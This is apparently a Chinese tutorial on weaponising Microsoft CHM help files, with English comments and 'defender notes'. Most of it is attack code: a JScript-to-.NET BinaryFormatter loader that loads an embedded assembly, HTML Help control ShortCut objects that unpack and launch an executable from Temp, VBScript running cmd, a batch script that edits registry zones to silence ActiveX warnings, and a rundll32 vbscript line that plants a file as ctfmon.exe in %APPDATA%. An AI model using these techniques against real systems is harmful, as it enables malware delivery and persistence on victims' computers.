微软HTML帮助集,即编译的HTML帮助文件(英语:Microsoft Compiled HTML Help, CHM),是微软继承早先的WinHelp发展出的一种文件格式,用来提供在线帮助,是一种应用较广泛的文件格式,因为CHM文件如一本书一样,可以提供内容目录、索引和搜索等功能。CHM帮助文件通常可以使用RAR等压缩工具打开。
[OPTIONS] Compatibility=1.1 or later Compiled file=PocCalc.chm Contents file=Table of Contents.hhc Index file=Index.hhk Default topic=poc.html Title=PocCalc Display compile progress=No Language=0x410 Italian (Italy) Full-text search=Yes
// Set COMPLUS_Version in the current process environment so the CLR that the script host
// subsequently loads is v2.0.50727 (the .NET 2.0 runtime); this is a prerequisite for the
// COM-visible .NET classes used further down to resolve.
// Defender note: help content setting COMPLUS_Version through WScript.Shell is a known marker of
// script-hosted .NET loaders and is worth an alert in script-host / Sysmon telemetry.
function setversion() { new ActiveXObject('WScript.Shell').Environment('Process')('COMPLUS_Version') = 'v2.0.50727'; }
// Decode a base64 string into a System.IO.MemoryStream, using only .NET classes that are
// reachable as COM ProgIDs (ASCIIEncoding, FromBase64Transform, MemoryStream).
// b      : base64 text.
// returns: a MemoryStream positioned at 0 holding the decoded bytes.
// Note: the number of bytes written is computed as (length / 4) * 3 from the *encoded* byte count
// (GetByteCount_2), not from what TransformFinalBlock actually produced, so it apparently assumes
// a padded, whitespace-free input.
// Defender note: the creation of System.Text / System.Security.Cryptography / System.IO ProgIDs
// from a script host is the signature of the JScript-to-.NET bridging technique; this ProgID set
// is a reliable thing to hunt for.
function base64ToStream(b) { var enc = new ActiveXObject("System.Text.ASCIIEncoding"); var length = enc.GetByteCount_2(b); var ba = enc.GetBytes_4(b); var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform"); ba = transform.TransformFinalBlock(ba, 0, length); var ms = new ActiveXObject("System.IO.MemoryStream"); ms.Write(ba, 0, (length / 4) * 3); ms.Position = 0; return ms; }
// (Part of the payload is omitted here.)
// serialized_obj is a base64-encoded BinaryFormatter object graph; it is passed to
// BinaryFormatter.Deserialize_2 further down. The decoded prefix names
// System.DelegateSerializationHolder and "System.Reflection.Assembly Load(Byte[])", i.e. a
// delegate graph that resolves to Assembly.Load. Because the listing is truncated, this literal
// does not decode to a complete stream as shown. entry_class names the type that is later
// instantiated from the loaded assembly via CreateInstance.
// Defender note: BinaryFormatter deserialising script-controlled data is the condition to block
// or alert on; BinaryFormatter is deprecated for any untrusted input.
var serialized_obj = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy"+ "AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph"+ "dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk"+ "ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD"+ "AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRl"+ "RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRU"+ "AAAAAAAAAAAAAAAAAQ0AAAAEAAAACRcAAAAJBgAAAAkWAAAABhoAAAAnU3lzdGVtLlJlZmxlY3Rp"+ "b24uQXNzZW1ibHkgTG9hZChCeXRlW10pCAAAAAoL"; var entry_class = 'TestClass';
try { setversion(); var stm = base64ToStream(serialized_obj); var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter'); var al = new ActiveXObject('System.Collections.ArrayList'); var d = fmt.Deserialize_2(stm); al.Add(undefined); var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class); o.Cp(path, execuablePath, downloadPath); invokeSuccess = true; } catch (e) { debug(e.message); } return invokeSuccess; } var href = "";
<pid="t0">Hello World!</p>
<SCRIPT>
// Get the directory: take the text between the first ":" and the last ":" of
// document.location.pathname (skipping the leading character). Presumably this recovers the
// CHM's on-disk path from an MSITStore-style URL — TODO confirm the exact pathname layout in hh.exe.
function getPath(){
    var pathName = document.location.pathname;
    var index0 = pathName.substr(1).indexOf(":");
    var index1 = pathName.substr(1).lastIndexOf(":");
    var result = pathName.substr(index0+2,index1-index0-2);
    return result;
}
// Check whether the file exists; if it does, click the AUTO object, whose ShortCut item
// launches it (see commodStr below).
function isHasFile(){
    var a,s='C:\\Windows\\Temp\\Downloads\\Test7Z1.exe';
    a = new ActiveXObject("Scripting.FileSystemObject");
    if(a.FileExists(s)) AUTO.Click();
}
var dir = getPath();
// Two <OBJECT>s bound to the HTML Help control (clsid adb880a6-d8ff-11cf-9377-00aa003b7a11),
// both using Command=ShortCut. The first ("unrar") appears to run "hh -decompile" with
// C:\Windows\Temp\Downloads\ as the output folder and dir as the CHM to extract; the second
// ("AUTO") runs the extracted Test7Z1.exe.
// Defender note: the help viewer spawning hh.exe with -decompile, or spawning an executable from a
// Temp directory, is a high-signal process-tree indicator for CHM abuse; the ShortCut command of
// the HTML Help control is the capability to restrict or monitor.
var commodStr = '<OBJECTid=unrarclassid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"width=1height=1>' + '<PARAMname="Command"value="ShortCut">' + '<PARAMname="Button"value="Bitmap::shortcut">' + '<PARAMname="Item1"value=",hh, -decompile C:\\Windows\\Temp\\Downloads\\ ' + dir + '"></OBJECT><OBJECTid=AUTOclassid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"width=1height=1><PARAMname="Command"value="ShortCut"><PARAMname="Button"value="Bitmap::shortcut"><PARAMname="Item1"value=",C:\\Windows\\Temp\\Downloads\\Test7Z1.exe"><PARAMname="Item2"value="273,1,1"></OBJECT>';
document.getElementById('t0').innerHTML = commodStr;
unrar.Click();
isHasFile();
</SCRIPT>
ActiveXObject
缺点:打开时会弹出是否运行ActiveXObject的警告,但可以通过修改注册表关闭该警告。
<html>
<scripttype="text/vbscript">
' Proof-of-concept payload: create WScript.Shell and run "cmd /c calc", then release the object.
' Defender note: a WScript.Shell.Run call from VBScript embedded in help content shows up as the
' help viewer (or the embedding browser) spawning cmd.exe — that parent/child relationship is
' the thing to alert on.
Functiontest()
Dim oShell
Set oShell = CreateObject("WSCript.shell")
oShell.run"cmd /c calc"
Set oShell = Nothing
EndFunction
test()
</script>
</html>
注册表关闭ActiveXObject提示的Bat脚本
执行该bat脚本将关闭针对包含ActiveXObject脚本的文件的警告提示。
echo off
cls
REM bl is the loop counter over the Internet Settings security zones; it starts at 0 and the
REM loop exits once it reaches 5 (label "ex" is not part of this excerpt).
set bl=0
:setreg
if"%bl%"=="5"goto ex
REM regpath selects HKCU\...\Internet Settings\Zones\<zone>. The values written under it, and
REM the increment of bl, belong to the part of the script that is not shown here.
REM Defender note: changes under the per-zone keys of Internet Settings\Zones relax prompting
REM for scripts/ActiveX content; registry auditing or EDR rules on this path catch them.
set regpath=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%bl%
cls
<!-- Item1 of a ShortCut PARAM: starts rundll32.exe with a vbscript: URL so that mshtml's
     RunHTMLApplication executes the inline VBScript. That script enumerates the files of
     GetSpecialFolder(2) (the temporary folder), copies the first file whose size is exactly
     7168 bytes to %APPDATA%\ctfmon.exe, then closes the window. The enclosing <OBJECT> is not
     shown, and the line is repeated verbatim below.
     Defender note: rundll32.exe with "vbscript:" and "RunHTMLApplication" on its command line,
     and a newly written ctfmon.exe under %APPDATA%, are the indicators to monitor. -->
<PARAMname="Item1"value=',rundll32.exe,vbscript:"\..\mshtml,,,RunHTMLApplication "<br>execute("Set fso=CreateObject(""Scripting.FileSystemobject""):appdata=(CreateObject(""Wscript.Shell"")).ExpandEnvironmentstrings(""%APPDATA%"")&""\ctfmon.exe"":Set fc=fso.GetFolder(fso.GetSpecialFolder(2)).files:For Each f1 in fc:If f1.size=7168 then : fso.CopyFile f1, appdata:Exit For:End If:Next:window.close()")'>
<PARAMname="Item1"value=',rundll32.exe,vbscript:"\..\mshtml,,,RunHTMLApplication "<br>execute("Set fso=CreateObject(""Scripting.FileSystemobject""):appdata=(CreateObject(""Wscript.Shell"")).ExpandEnvironmentstrings(""%APPDATA%"")&""\ctfmon.exe"":Set fc=fso.GetFolder(fso.GetSpecialFolder(2)).files:For Each f1 in fc:If f1.size=7168 then : fso.CopyFile f1, appdata:Exit For:End If:Next:window.close()")'>